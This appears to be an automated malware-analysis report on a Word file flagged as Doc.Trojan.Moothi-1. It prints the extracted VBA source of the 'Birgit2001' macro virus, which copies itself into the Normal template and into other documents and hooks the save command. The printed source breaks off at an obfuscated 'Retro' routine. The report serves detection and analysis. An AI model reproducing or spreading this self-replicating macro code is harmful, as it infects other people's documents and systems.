MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file is identified as malicious by ClamAV with the signature 'Doc.Trojan.Moothi-1'. Static analysis revealed the presence of VBA macros within the document. These macros are highly likely to be responsible for downloading and executing a secondary malicious payload, a common tactic for this type of threat.
Heuristics 2
-
ClamAV: Doc.Trojan.Moothi-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Moothi-1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 23897 bytes |
SHA-256: 3993c346e52e1e5b256a785b587cffd636e7b9a2d8fbe01391f2c95cd6df12d8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Modul1" '*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$* '$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$ '*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$* ' __ __ ' | | | | ' _|__|_|__|_ ____ ____ _________ _________ _________ ____ ____ ___ ________ '/ \ / \ / \ / \ / \ / \ / \ / \ / \ / \ '| ________| | \ / | | ___ | | ___ | | | | | | | | | | _____/ '| | | \/ | | / \ | | / \ | | | | | | | \___/ | | '| |________ | | | | | | | | | | |__ __| | |_| | ___ | |__ '| \ | | | | | | | | | | | | | | | | | | '|______ | | |\ /| | | | | | | | | | | | | _ | | | | __| ' | | | | \/ | | | | | | | | | | | | | | | | | | | | ' ______| | | | | | | \___/ | | \___/ | | | | | | | | | | |____ '| | | | | | | | | | | | | | | | | | | \ '\___________/ \____/ \____/ \_________/ \_________/ \___/ \____/ \____/ \___/ \________/ ' | | | | - $MOOTHiE Da HuStla [ZeroGravity] ' |__| |__| - August 15, 2000 ' '*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$* '$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$ '*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$* 'Virus Creation: 09/09/00 13.39.36 $*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$ '$* Poly = Yes $* '$* Retro = Yes $* '$* Stealth = High $* '$* Infection = New $* '$* Payload = Save $* '$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$ |-----====== CODE Starts ======-----| Private Sub Document_New() On Error Resume Next Call Poly1 'Author: Doctor Rave 'Name: Birgit2001 'Comments: This is not a troja 'Origin: Germany 'This Word2000 virus was created using $MOOTHiE Da HuStla's Macro Virus Creator 2000 Ver 2.0 On Error Resume Next: Randomize Dim XXX1 As Object, XXX2 As Object, XXX3 As Object, XXX4 As Object, XXX5 As Object Dim YYY1 As Object, YYY2 As Object, YYY3 As Object, YYY4 As Object, YYY5 As Object Set XXX1 = ActiveDocument: Set XXX2 = XXX1.VBProject: Set XXX3 = XXX2.VBComponents: Set XXX4 = XXX3.Item(1): Set XXX5 = XXX4.CodeModule Set YYY1 = NormalTemplate: Set YYY2 = YYY1.VBProject: Set YYY3 = YYY2.VBComponents: Set YYY4 = YYY3.Item(1): Set YYY5 = YYY4.CodeModule AAA = YYY5.CountOfLines: BBB = XXX5.CountOfLines: CCC = Chr(Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65) If AAA < BBB Then For XXX = 1 To AAA: NT5.replaceline XXX, CCC: Next XXX For XXX = 1 To BBB: XXXA = XXX5.Lines(XXX, 1): YYY5.Insertlines XXX, XXXA: Next XXX NormalTemplate.Save: End If If BBB < AAA Then For XXX = 1 To BBB: XXX5.replaceline XXX, CCC: Next XXX For XXX = 1 To AAA: XXXA = YYY5.Lines(XXX, 1): XXX5.Insertlines XXX, XXXA: Next XXX ActiveDocument.Save: End If Call Retro End Sub Sub FileSave() On Error Resume Next MsgBox "You have been infected by the Birgit2001 virus!" ActiveDocument.Save 'Actual Save Command End Sub Private Sub Retro() On Error Resume Next: h$ = Chr(99) & Chr(58) & Chr(92) & Chr(97) & Chr(117) & Chr(116) & Chr(111) & Chr(101) & Chr( ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.